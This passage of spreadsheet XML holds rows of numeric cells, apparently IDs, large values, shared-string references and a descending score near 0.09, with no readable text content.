        <v>2280</v>
      </c>
      <c r="D2464" s="2">
        <v>1.0</v>
      </c>
      <c r="E2464" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2464" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2465" ht="15.75" customHeight="1">
      <c r="A2465" s="1">
        <v>24160.0</v>
      </c>
      <c r="B2465" s="2">
        <v>1.0146009E7</v>
      </c>
      <c r="C2465" s="2" t="s">
        <v>2281</v>
      </c>
      <c r="D2465" s="2">
        <v>1.0</v>
      </c>
      <c r="E2465" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2465" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2466" ht="15.75" customHeight="1">
      <c r="A2466" s="1">
        <v>24480.0</v>
      </c>
      <c r="B2466" s="2">
        <v>1.1045432E7</v>
      </c>
      <c r="C2466" s="2" t="s">
        <v>2263</v>
      </c>
      <c r="D2466" s="2">
        <v>1.0</v>
      </c>
      <c r="E2466" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2466" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2467" ht="15.75" customHeight="1">
      <c r="A2467" s="1">
        <v>24578.0</v>
      </c>
      <c r="B2467" s="2">
        <v>1.1327063E7</v>
      </c>
      <c r="C2467" s="2" t="s">
        <v>2282</v>
      </c>
      <c r="D2467" s="2">
        <v>1.0</v>
      </c>
      <c r="E2467" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2467" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2468" ht="15.75" customHeight="1">
      <c r="A2468" s="1">
        <v>24671.0</v>
      </c>
      <c r="B2468" s="2">
        <v>1.158059E7</v>
      </c>
      <c r="C2468" s="2" t="s">
        <v>2283</v>
      </c>
      <c r="D2468" s="2">
        <v>1.0</v>
      </c>
      <c r="E2468" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2468" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2469" ht="15.75" customHeight="1">
      <c r="A2469" s="1">
        <v>25067.0</v>
      </c>
      <c r="B2469" s="2">
        <v>1.2874786E7</v>
      </c>
      <c r="C2469" s="2" t="s">
        <v>2284</v>
      </c>
      <c r="D2469" s="2">
        <v>1.0</v>
      </c>
      <c r="E2469" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2469" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2470" ht="15.75" customHeight="1">
      <c r="A2470" s="1">
        <v>25315.0</v>
      </c>
      <c r="B2470" s="2">
        <v>1.3432386E7</v>
      </c>
      <c r="C2470" s="2" t="s">
        <v>2285</v>
      </c>
      <c r="D2470" s="2">
        <v>1.0</v>
      </c>
      <c r="E2470" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2470" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2471" ht="15.75" customHeight="1">
      <c r="A2471" s="1">
        <v>25645.0</v>
      </c>
      <c r="B2471" s="2">
        <v>1.4518186E7</v>
      </c>
      <c r="C2471" s="2" t="s">
        <v>2286</v>
      </c>
      <c r="D2471" s="2">
        <v>1.0</v>
      </c>
      <c r="E2471" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2471" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2472" ht="15.75" customHeight="1">
      <c r="A2472" s="1">
        <v>26056.0</v>
      </c>
      <c r="B2472" s="2">
        <v>1.5524904E7</v>
      </c>
      <c r="C2472" s="2" t="s">
        <v>2287</v>
      </c>
      <c r="D2472" s="2">
        <v>1.0</v>
      </c>
      <c r="E2472" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2472" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2473" ht="15.75" customHeight="1">
      <c r="A2473" s="1">
        <v>27729.0</v>
      </c>
      <c r="B2473" s="2">
        <v>2.308002E7</v>
      </c>
      <c r="C2473" s="2" t="s">
        <v>2288</v>
      </c>
      <c r="D2473" s="2">
        <v>1.0</v>
      </c>
      <c r="E2473" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2473" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2474" ht="15.75" customHeight="1">
      <c r="A2474" s="1">
        <v>28235.0</v>
      </c>
      <c r="B2474" s="2">
        <v>2.5203538E7</v>
      </c>
      <c r="C2474" s="2" t="s">
        <v>2289</v>
      </c>
      <c r="D2474" s="2">
        <v>1.0</v>
      </c>
      <c r="E2474" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2474" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2475" ht="15.75" customHeight="1">
      <c r="A2475" s="1">
        <v>28302.0</v>
      </c>
      <c r="B2475" s="2">
        <v>2.5630087E7</v>
      </c>
      <c r="C2475" s="2" t="s">
        <v>2290</v>
      </c>
      <c r="D2475" s="2">
        <v>1.0</v>
      </c>
      <c r="E2475" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2475" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2476" ht="15.75" customHeight="1">
      <c r="A2476" s="1">
        <v>29518.0</v>
      </c>
      <c r="B2476" s="2">
        <v>3.2766527E7</v>
      </c>
      <c r="C2476" s="2" t="s">
        <v>2291</v>
      </c>
      <c r="D2476" s="2">
        <v>1.0</v>
      </c>
      <c r="E2476" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2476" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2477" ht="15.75" customHeight="1">
      <c r="A2477" s="1">
        <v>29985.0</v>
      </c>
      <c r="B2477" s="2">
        <v>3.6107381E7</v>
      </c>
      <c r="C2477" s="2" t="s">
        <v>2270</v>
      </c>
      <c r="D2477" s="2">
        <v>1.0</v>
      </c>
      <c r="E2477" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2477" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2478" ht="15.75" customHeight="1">
      <c r="A2478" s="1">
        <v>30654.0</v>
      </c>
      <c r="B2478" s="2">
        <v>4.2024021E7</v>
      </c>
      <c r="C2478" s="2" t="s">
        <v>2292</v>
      </c>
      <c r="D2478" s="2">
        <v>1.0</v>
      </c>
      <c r="E2478" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2478" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2479" ht="15.75" customHeight="1">
      <c r="A2479" s="1">
        <v>30740.0</v>
      </c>
      <c r="B2479" s="2">
        <v>4.4029816E7</v>
      </c>
      <c r="C2479" s="2" t="s">
        <v>2293</v>
      </c>
      <c r="D2479" s="2">
        <v>1.0</v>
      </c>
      <c r="E2479" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2479" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2480" ht="15.75" customHeight="1">
      <c r="A2480" s="1">
        <v>30757.0</v>
      </c>
      <c r="B2480" s="2">
        <v>4.425004E7</v>
      </c>
      <c r="C2480" s="2" t="s">
        <v>2294</v>
      </c>
      <c r="D2480" s="2">
        <v>1.0</v>
      </c>
      <c r="E2480" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2480" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2481" ht="15.75" customHeight="1">
      <c r="A2481" s="1">
        <v>30918.0</v>
      </c>
      <c r="B2481" s="2">
        <v>4.6827167E7</v>
      </c>
      <c r="C2481" s="2" t="s">
        <v>2294</v>
      </c>
      <c r="D2481" s="2">
        <v>1.0</v>
      </c>
      <c r="E2481" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2481" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2482" ht="15.75" customHeight="1">
      <c r="A2482" s="1">
        <v>31384.0</v>
      </c>
      <c r="B2482" s="2">
        <v>4998051.0</v>
      </c>
      <c r="C2482" s="2" t="s">
        <v>2295</v>
      </c>
      <c r="D2482" s="2">
        <v>1.0</v>
      </c>
      <c r="E2482" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2482" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2483" ht="15.75" customHeight="1">
      <c r="A2483" s="1">
        <v>31560.0</v>
      </c>
      <c r="B2483" s="2">
        <v>5121429.0</v>
      </c>
      <c r="C2483" s="2" t="s">
        <v>2296</v>
      </c>
      <c r="D2483" s="2">
        <v>1.0</v>
      </c>
      <c r="E2483" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2483" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2484" ht="15.75" customHeight="1">
      <c r="A2484" s="1">
        <v>31632.0</v>
      </c>
      <c r="B2484" s="2">
        <v>5146881.0</v>
      </c>
      <c r="C2484" s="2" t="s">
        <v>2297</v>
      </c>
      <c r="D2484" s="2">
        <v>1.0</v>
      </c>
      <c r="E2484" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2484" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2485" ht="15.75" customHeight="1">
      <c r="A2485" s="1">
        <v>31839.0</v>
      </c>
      <c r="B2485" s="2">
        <v>5267986.0</v>
      </c>
      <c r="C2485" s="2" t="s">
        <v>2298</v>
      </c>
      <c r="D2485" s="2">
        <v>1.0</v>
      </c>
      <c r="E2485" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2485" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2486" ht="15.75" customHeight="1">
      <c r="A2486" s="1">
        <v>32423.0</v>
      </c>
      <c r="B2486" s="2">
        <v>5.6447284E7</v>
      </c>
      <c r="C2486" s="2" t="s">
        <v>2299</v>
      </c>
      <c r="D2486" s="2">
        <v>1.0</v>
      </c>
      <c r="E2486" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2486" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2487" ht="15.75" customHeight="1">
      <c r="A2487" s="1">
        <v>32558.0</v>
      </c>
      <c r="B2487" s="2">
        <v>5.7585623E7</v>
      </c>
      <c r="C2487" s="2" t="s">
        <v>2300</v>
      </c>
      <c r="D2487" s="2">
        <v>1.0</v>
      </c>
      <c r="E2487" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2487" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2488" ht="15.75" customHeight="1">
      <c r="A2488" s="1">
        <v>33086.0</v>
      </c>
      <c r="B2488" s="2">
        <v>6936556.0</v>
      </c>
      <c r="C2488" s="2" t="s">
        <v>2301</v>
      </c>
      <c r="D2488" s="2">
        <v>1.0</v>
      </c>
      <c r="E2488" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2488" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2489" ht="15.75" customHeight="1">
      <c r="A2489" s="1">
        <v>33160.0</v>
      </c>
      <c r="B2489" s="2">
        <v>7086085.0</v>
      </c>
      <c r="C2489" s="2" t="s">
        <v>2302</v>
      </c>
      <c r="D2489" s="2">
        <v>1.0</v>
      </c>
      <c r="E2489" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2489" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2490" ht="15.75" customHeight="1">
      <c r="A2490" s="1">
        <v>7506.0</v>
      </c>
      <c r="B2490" s="2">
        <v>5.1395233E7</v>
      </c>
      <c r="C2490" s="2" t="s">
        <v>2303</v>
      </c>
      <c r="D2490" s="2">
        <v>1.0</v>
      </c>
      <c r="E2490" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2490" s="2">
        <v>0.09748427672955974</v>
      </c>
    </row>
    <row r="2491" ht="15.75" customHeight="1">
      <c r="A2491" s="1">
        <v>2213.0</v>
      </c>
      <c r="B2491" s="2">
        <v>3.2078219E7</v>
      </c>
      <c r="C2491" s="2" t="s">
        <v>2304</v>
      </c>
      <c r="D2491" s="2">
        <v>1.0</v>
      </c>
      <c r="E2491" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2491" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="2492" ht="15.75" customHeight="1">
      <c r="A2492" s="1">
        <v>9723.0</v>
      </c>
      <c r="B2492" s="2">
        <v>5.6431549E7</v>
      </c>
      <c r="C2492" s="2" t="s">
        <v>2305</v>
      </c>
      <c r="D2492" s="2">
        <v>1.0</v>
      </c>
      <c r="E2492" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2492" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="2493" ht="15.75" customHeight="1">
      <c r="A2493" s="1">
        <v>12113.0</v>
      </c>
      <c r="B2493" s="2">
        <v>2.6877756E7</v>
      </c>
      <c r="C2493" s="2" t="s">
        <v>2306</v>
      </c>
      <c r="D2493" s="2">
        <v>1.0</v>
      </c>
      <c r="E2493" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2493" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="2494" ht="15.75" customHeight="1">
      <c r="A2494" s="1">
        <v>15262.0</v>
      </c>
      <c r="B2494" s="2">
        <v>4.2307635E7</v>
      </c>
      <c r="C2494" s="2" t="s">
        <v>2307</v>
      </c>
      <c r="D2494" s="2">
        <v>1.0</v>
      </c>
      <c r="E2494" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2494" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="2495" ht="15.75" customHeight="1">
      <c r="A2495" s="1">
        <v>18280.0</v>
      </c>
      <c r="B2495" s="2">
        <v>5.2250092E7</v>
      </c>
      <c r="C2495" s="2" t="s">
        <v>2308</v>
      </c>
      <c r="D2495" s="2">
        <v>1.0</v>
      </c>
      <c r="E2495" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2495" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="2496" ht="15.75" customHeight="1">
      <c r="A2496" s="1">
        <v>23046.0</v>
      </c>
      <c r="B2496" s="2">
        <v>5.0180591E7</v>
      </c>
      <c r="C2496" s="2" t="s">
        <v>2309</v>
      </c>
      <c r="D2496" s="2">
        <v>1.0</v>
      </c>
      <c r="E2496" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2496" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="2497" ht="15.75" customHeight="1">
      <c r="A2497" s="1">
        <v>33617.0</v>
      </c>
      <c r="B2497" s="2">
        <v>8343259.0</v>
      </c>
      <c r="C2497" s="2" t="s">
        <v>2310</v>
      </c>
      <c r="D2497" s="2">
        <v>1.0</v>
      </c>
      <c r="E2497" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2497" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="2498" ht="15.75" customHeight="1">
      <c r="A2498" s="1">
        <v>315.0</v>
      </c>
      <c r="B2498" s="2">
        <v>1.5621246E7</v>
      </c>
      <c r="C2498" s="2" t="s">
        <v>2311</v>
      </c>
      <c r="D2498" s="2">
        <v>1.0</v>
      </c>
      <c r="E2498" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2498" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="2499" ht="15.75" customHeight="1">
      <c r="A2499" s="1">
        <v>746.0</v>
      </c>
      <c r="B2499" s="2">
        <v>2.0887896E7</v>
      </c>
      <c r="C2499" s="2" t="s">
        <v>2312</v>
      </c>
      <c r="D2499" s="2">
        <v>1.0</v>
      </c>
      <c r="E2499" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2499" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="2500" ht="15.75" customHeight="1">
      <c r="A2500" s="1">
        <v>16400.0</v>
      </c>
      <c r="B2500" s="2">
        <v>4.6286123E7</v>
      </c>
      <c r="C2500" s="2" t="s">
        <v>2313</v>
      </c>
      <c r="D2500" s="2">
        <v>1.0</v>
      </c>
      <c r="E2500" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2500" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="2501" ht="15.75" customHeight="1">
      <c r="A2501" s="1">
        <v>31787.0</v>
      </c>
      <c r="B2501" s="2">
        <v>5.232856E7</v>
      </c>
      <c r="C2501" s="2" t="s">
        <v>2314</v>
      </c>
      <c r="D2501" s="2">
        <v>1.0</v>
      </c>
      <c r="E2501" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2501" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="2502" ht="15.75" customHeight="1">
      <c r="A2502" s="1">
        <v>6551.0</v>
      </c>
      <c r="B2502" s="2">
        <v>4.8854031E7</v>
      </c>
      <c r="C2502" s="2" t="s">
        <v>2315</v>
      </c>
      <c r="D2502" s="2">
        <v>1.0</v>
      </c>
      <c r="E2502" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2502" s="2">
        <v>0.09623015873015872</v>
      </c>
    </row>
    <row r="2503" ht="15.75" customHeight="1">
      <c r="A2503" s="1">
        <v>2656.0</v>
      </c>
      <c r="B2503" s="2">
        <v>3.4691478E7</v>
      </c>
      <c r="C2503" s="2" t="s">
        <v>2316</v>
      </c>
      <c r="D2503" s="2">
        <v>1.0</v>
      </c>
      <c r="E2503" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2503" s="2">
        <v>0.09623015873015871</v>
      </c>
    </row>
    <row r="2504" ht="15.75" customHeight="1">
      <c r="A2504" s="1">
        <v>21773.0</v>
      </c>
      <c r="B2504" s="2">
        <v>2.640865E7</v>
      </c>
      <c r="C2504" s="2" t="s">
        <v>2317</v>
      </c>
      <c r="D2504" s="2">
        <v>1.0</v>
      </c>
      <c r="E2504" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2504" s="2">
        <v>0.09623015873015871</v>
      </c>
    </row>
    <row r="2505" ht="15.75" customHeight="1">
      <c r="A2505" s="1">
        <v>15000.0</v>
      </c>
      <c r="B2505" s="2">
        <v>4.1462791E7</v>
      </c>
      <c r="C2505" s="2" t="s">
        <v>2318</v>
      </c>
      <c r="D2505" s="2">
        <v>1.0</v>
      </c>
      <c r="E2505" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2505" s="2">
        <v>0.09595959595959597</v>
      </c>
    </row>
    <row r="2506" ht="15.75" customHeight="1">
      <c r="A2506" s="1">
        <v>19543.0</v>
      </c>
      <c r="B2506" s="2">
        <v>5.6030506E7</v>
      </c>
      <c r="C2506" s="2" t="s">
        <v>2319</v>
      </c>
      <c r="D2506" s="2">
        <v>1.0</v>
      </c>
      <c r="E2506" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2506" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="2507" ht="15.75" customHeight="1">
      <c r="A2507" s="1">
        <v>23820.0</v>
      </c>
      <c r="B2507" s="2">
        <v>7986415.0</v>
      </c>
      <c r="C2507" s="2" t="s">
        <v>2320</v>
      </c>
      <c r="D2507" s="2">
        <v>1.0</v>
      </c>
      <c r="E2507" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2507" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="2508" ht="15.75" customHeight="1">
      <c r="A2508" s="1">
        <v>29283.0</v>
      </c>
      <c r="B2508" s="2">
        <v>3.1016616E7</v>
      </c>
      <c r="C2508" s="2" t="s">
        <v>2321</v>
      </c>
      <c r="D2508" s="2">
        <v>1.0</v>
      </c>
      <c r="E2508" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2508" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="2509" ht="15.75" customHeight="1">
      <c r="A2509" s="1">
        <v>7882.0</v>
      </c>
      <c r="B2509" s="2">
        <v>5.2415152E7</v>
      </c>
      <c r="C2509" s="2" t="s">
        <v>2322</v>
      </c>
      <c r="D2509" s="2">
        <v>1.0</v>
      </c>
      <c r="E2509" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2509" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="2510" ht="15.75" customHeight="1">
      <c r="A2510" s="1">
        <v>10572.0</v>
      </c>
      <c r="B2510" s="2">
        <v>1.2964169E7</v>
      </c>
      <c r="C2510" s="2" t="s">
        <v>2323</v>
      </c>
      <c r="D2510" s="2">
        <v>1.0</v>
      </c>
      <c r="E2510" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2510" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="2511" ht="15.75" customHeight="1">
      <c r="A2511" s="1">
        <v>11542.0</v>
      </c>
      <c r="B2511" s="2">
        <v>2.2627834E7</v>
      </c>
      <c r="C2511" s="2" t="s">
        <v>2324</v>
      </c>
      <c r="D2511" s="2">
        <v>1.0</v>
      </c>
      <c r="E2511" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2511" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="2512" ht="15.75" customHeight="1">
      <c r="A2512" s="1">
        <v>12158.0</v>
      </c>
      <c r="B2512" s="2">
        <v>2.7303417E7</v>
      </c>
      <c r="C2512" s="2" t="s">
        <v>2325</v>
      </c>
      <c r="D2512" s="2">
        <v>1.0</v>
      </c>
      <c r="E2512" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2512" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="2513" ht="15.75" customHeight="1">
      <c r="A2513" s="1">
        <v>12175.0</v>
      </c>
      <c r="B2513" s="2">
        <v>2.7452521E7</v>
      </c>
      <c r="C2513" s="2" t="s">
        <v>2326</v>
      </c>
      <c r="D2513" s="2">
        <v>1.0</v>
      </c>
      <c r="E2513" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2513" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="2514" ht="15.75" customHeight="1">
      <c r="A2514" s="1">
        <v>14418.0</v>
      </c>
      <c r="B2514" s="2">
        <v>3.9242947E7</v>
      </c>
      <c r="C2514" s="2" t="s">
        <v>2327</v>
      </c>
      <c r="D2514" s="2">
        <v>1.0</v>
      </c>
      <c r="E2514" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2514" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="2515" ht="15.75" customHeight="1">
      <c r="A2515" s="1">
        <v>15178.0</v>
      </c>
      <c r="B2515" s="2">
        <v>4.2021494E7</v>
      </c>
      <c r="C2515" s="2" t="s">
        <v>2328</v>
      </c>
      <c r="D2515" s="2">
        <v>1.0</v>
      </c>
      <c r="E2515" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2515" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="2516" ht="15.75" customHeight="1">
      <c r="A2516" s="1">
        <v>18588.0</v>
      </c>
      <c r="B2516" s="2">
        <v>5.3257577E7</v>
      </c>
      <c r="C2516" s="2" t="s">
        <v>2329</v>
      </c>
      <c r="D2516" s="2">
        <v>1.0</v>
      </c>
      <c r="E2516" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2516" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="2517" ht="15.75" customHeight="1">
      <c r="A2517" s="1">
        <v>20864.0</v>
      </c>
      <c r="B2517" s="2">
        <v>1.5869221E7</v>
      </c>
      <c r="C2517" s="2" t="s">
        <v>2330</v>
      </c>
      <c r="D2517" s="2">
        <v>1.0</v>
      </c>
      <c r="E2517" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2517" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="2518" ht="15.75" customHeight="1">
      <c r="A2518" s="1">
        <v>22543.0</v>
      </c>
      <c r="B2518" s="2">
        <v>3.8056389E7</v>
      </c>
      <c r="C2518" s="2" t="s">
        <v>2331</v>
      </c>
      <c r="D2518" s="2">
        <v>1.0</v>
      </c>
      <c r="E2518" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2518" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="2519" ht="15.75" customHeight="1">
      <c r="A2519" s="1">
        <v>26117.0</v>
      </c>
      <c r="B2519" s="2">
        <v>1.586922E7</v>
      </c>
      <c r="C2519" s="2" t="s">
        <v>2330</v>
      </c>
      <c r="D2519" s="2">
        <v>1.0</v>
      </c>
      <c r="E2519" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2519" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="2520" ht="15.75" customHeight="1">
      <c r="A2520" s="1">
        <v>29346.0</v>
      </c>
      <c r="B2520" s="2">
        <v>3.1457444E7</v>
      </c>
      <c r="C2520" s="2" t="s">
        <v>2332</v>
      </c>
      <c r="D2520" s="2">
        <v>1.0</v>
      </c>
      <c r="E2520" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2520" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="2521" ht="15.75" customHeight="1">
      <c r="A2521" s="1">
        <v>31742.0</v>
      </c>
      <c r="B2521" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C2521" s="2" t="s">
        <v>2333</v>
      </c>
      <c r="D2521" s="2">
        <v>1.0</v>
      </c>
      <c r="E2521" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2521" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="2522" ht="15.75" customHeight="1">
      <c r="A2522" s="1">
        <v>15541.0</v>
      </c>
      <c r="B2522" s="2">
        <v>4337075.0</v>
      </c>
      <c r="C2522" s="2" t="s">
        <v>2334</v>
      </c>
      <c r="D2522" s="2">
        <v>1.0</v>
      </c>
      <c r="E2522" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2522" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="2523" ht="15.75" customHeight="1">
      <c r="A2523" s="1">
        <v>23083.0</v>
      </c>
      <c r="B2523" s="2">
        <v>5.0642267E7</v>
      </c>
      <c r="C2523" s="2" t="s">
        <v>2335</v>
      </c>
      <c r="D2523" s="2">
        <v>1.0</v>
      </c>
      <c r="E2523" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2523" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="2524" ht="15.75" customHeight="1">
      <c r="A2524" s="1">
        <v>25415.0</v>
      </c>
      <c r="B2524" s="2">
        <v>1.379249E7</v>
      </c>
      <c r="C2524" s="2" t="s">
        <v>2336</v>
      </c>
      <c r="D2524" s="2">
        <v>1.0</v>
      </c>
      <c r="E2524" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2524" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="2525" ht="15.75" customHeight="1">
      <c r="A2525" s="1">
        <v>29587.0</v>
      </c>
      <c r="B2525" s="2">
        <v>3.3516662E7</v>
      </c>
      <c r="C2525" s="2" t="s">
        <v>2337</v>
      </c>
      <c r="D2525" s="2">
        <v>1.0</v>
      </c>
      <c r="E2525" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2525" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="2526" ht="15.75" customHeight="1">
      <c r="A2526" s="1">
        <v>22468.0</v>
      </c>
      <c r="B2526" s="2">
        <v>3.6698033E7</v>
      </c>
      <c r="C2526" s="2" t="s">
        <v>2338</v>
      </c>
      <c r="D2526" s="2">
        <v>1.0</v>
      </c>
      <c r="E2526" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2526" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="2527" ht="15.75" customHeight="1">
      <c r="A2527" s="1">
        <v>26373.0</v>
      </c>
      <c r="B2527" s="2">
        <v>1.6908987E7</v>
      </c>
      <c r="C2527" s="2" t="s">
        <v>2339</v>
      </c>
      <c r="D2527" s="2">
        <v>1.0</v>
      </c>
      <c r="E2527" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2527" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="2528" ht="15.75" customHeight="1">
      <c r="A2528" s="1">
        <v>32378.0</v>
      </c>
      <c r="B2528" s="2">
        <v>5.6096182E7</v>
      </c>
      <c r="C2528" s="2" t="s">
        <v>2340</v>
      </c>
      <c r="D2528" s="2">
        <v>1.0</v>
      </c>
      <c r="E2528" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2528" s="2">
        <v>0.09424603174603174</v>
      </c>
    </row>
    <row r="2529" ht="15.75" customHeight="1">
      <c r="A2529" s="1">
        <v>2200.0</v>
      </c>
      <c r="B2529" s="2">
        <v>3.2049379E7</v>
      </c>
      <c r="C2529" s="2" t="s">
        <v>2341</v>
      </c>
      <c r="D2529" s="2">
        <v>1.0</v>
      </c>
      <c r="E2529" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2529" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="2530" ht="15.75" customHeight="1">
      <c r="A2530" s="1">
        <v>14540.0</v>
      </c>
      <c r="B2530" s="2">
        <v>3.9902985E7</v>
      </c>
      <c r="C2530" s="2" t="s">
        <v>2342</v>
      </c>
      <c r="D2530" s="2">
        <v>1.0</v>
      </c>
      <c r="E2530" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2530" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="2531" ht="15.75" customHeight="1">
      <c r="A2531" s="1">
        <v>26849.0</v>
      </c>
      <c r="B2531" s="2">
        <v>1.9010525E7</v>
      </c>
      <c r="C2531" s="2" t="s">
        <v>2343</v>
      </c>
      <c r="D2531" s="2">
        <v>1.0</v>
      </c>
      <c r="E2531" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2531" s="2">
